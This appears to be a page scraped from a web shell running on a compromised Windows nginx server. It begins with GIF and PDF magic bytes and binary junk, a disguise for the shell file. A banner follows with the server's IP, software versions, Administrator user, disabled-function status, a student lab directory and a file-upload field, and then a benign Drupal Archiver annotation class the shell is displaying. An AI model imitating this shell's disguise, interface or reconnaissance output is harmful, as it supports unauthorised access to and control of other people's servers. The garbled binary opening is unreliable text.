GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.119 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /nginx/html/Student/JimMartinson/Lab12/drupal/core/lib/Drupal/Core/Archiver/Annotation/ |
Upload File : |
<?php namespace Drupal\Core\Archiver\Annotation; use Drupal\Component\Annotation\Plugin; /** * Defines an archiver annotation object. * * Plugin Namespace: Plugin\Archiver * * For a working example, see \Drupal\system\Plugin\Archiver\Zip * * @see \Drupal\Core\Archiver\ArchiverManager * @see \Drupal\Core\Archiver\ArchiverInterface * @see plugin_api * @see hook_archiver_info_alter() * * @Annotation */ class Archiver extends Plugin { /** * The archiver plugin ID. * * @var string */ public $id; /** * The human-readable name of the archiver plugin. * * @ingroup plugin_translatable * * @var \Drupal\Core\Annotation\Translation */ public $title; /** * The description of the archiver plugin. * * @ingroup plugin_translatable * * @var \Drupal\Core\Annotation\Translation */ public $description; /** * An array of valid extensions for this archiver. * * @var array */ public $extensions; }